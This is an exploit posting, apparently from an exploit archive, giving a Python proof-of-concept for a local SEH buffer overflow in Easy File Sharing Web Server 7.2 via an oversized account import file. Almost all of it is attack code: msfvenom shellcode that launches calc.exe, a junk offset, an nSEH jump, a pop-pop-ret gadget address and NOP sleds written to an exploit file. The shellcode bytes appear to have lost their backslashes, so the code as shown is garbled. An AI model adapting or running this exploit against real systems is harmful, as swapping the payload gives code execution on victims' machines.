Easy File Sharing Web Server 7.2 Account Import Buffer Overflow
Posted on 01 July 2017
#!/usr/bin/python ################################## # 2017/6/17 Chako # # EFS Web Server 7.2 - Local Buffer Overflow(SEH) # Tested on: Windows XP SP3 EN (DEP Off) # Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe # # Description: # When importing a large user account file on to EFS Web Server 7.2 # will trigger the vuln. ################################## import struct # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v Shellcode -f python Shellcode = "" Shellcode += "x89xe5xdbxd8xd9x75xf4x5fx57x59x49x49" Shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43" Shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30" Shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30" Shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49" Shellcode += "x59x6cx59x78x4dx52x75x50x57x70x43x30" Shellcode += "x55x30x6dx59x4bx55x55x61x6fx30x53x54" Shellcode += "x6ex6bx56x30x30x30x6cx4bx53x62x44x4c" Shellcode += "x6cx4bx36x32x72x34x4ex6bx34x32x75x78" Shellcode += "x44x4fx6dx67x50x4ax47x56x34x71x6bx4f" Shellcode += "x6ex4cx37x4cx31x71x53x4cx57x72x56x4c" Shellcode += "x55x70x7ax61x48x4fx44x4dx73x31x78x47" Shellcode += "x39x72x39x62x63x62x71x47x4ex6bx66x32" Shellcode += "x46x70x6cx4bx51x5ax37x4cx4cx4bx62x6c" Shellcode += "x46x71x53x48x58x63x32x68x57x71x38x51" Shellcode += "x70x51x6ex6bx62x79x71x30x66x61x58x53" Shellcode += "x4ex6bx57x39x34x58x39x73x67x4ax47x39" Shellcode += "x4cx4bx50x34x4ex6bx36x61x39x46x45x61" Shellcode += "x6bx4fx4cx6cx6bx71x78x4fx66x6dx56x61" Shellcode += "x6bx77x34x78x4bx50x74x35x6bx46x37x73" Shellcode += "x33x4dx38x78x67x4bx43x4dx67x54x43x45" Shellcode += "x59x74x63x68x4cx4bx70x58x46x44x67x71" Shellcode += "x6bx63x72x46x6cx4bx34x4cx52x6bx6cx4b" Shellcode += "x33x68x37x6cx55x51x49x43x4cx4bx55x54" Shellcode += "x4ex6bx63x31x6ax70x6bx39x53x74x35x74" Shellcode += "x57x54x73x6bx61x4bx53x51x50x59x33x6a" Shellcode += "x62x71x79x6fx4dx30x51x4fx33x6fx33x6a" Shellcode += "x6cx4bx37x62x5ax4bx6cx4dx31x4dx71x7a" Shellcode += "x57x71x4ex6dx4fx75x6cx72x43x30x77x70" Shellcode += "x73x30x50x50x42x48x56x51x4ex6bx52x4f" Shellcode += "x4ex67x6bx4fx68x55x4fx4bx48x70x6fx45" Shellcode += "x6cx62x50x56x52x48x4dx76x4ax35x4fx4d" Shellcode += "x6dx4dx49x6fx58x55x55x6cx33x36x61x6c" Shellcode += "x74x4ax6bx30x69x6bx4dx30x74x35x54x45" Shellcode += "x4dx6bx47x37x62x33x72x52x70x6fx32x4a" Shellcode += "x63x30x56x33x59x6fx4ex35x33x53x63x51" Shellcode += "x52x4cx33x53x44x6ex73x55x72x58x65x35" Shellcode += "x77x70x41x41" #SEH record (nseh field) at 0x0012b318 overwritten with normal pattern (offset 2563) Junk = "x41" * 2563 nSEH = "xEBx0Fx90x90" # 0x10012f3b : pop esi # pop ebx # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] # ASLR: False, Rebase: False, SafeSEH: False, OS: False SEH = struct.pack("<L", 0x10012f3b) NOP = "x90" * 10 BoF = Junk + nSEH + SEH + NOP + Shellcode + NOP print len(BoF) f = open ("exploit.txt", "w") f.write(BoF) f.close()
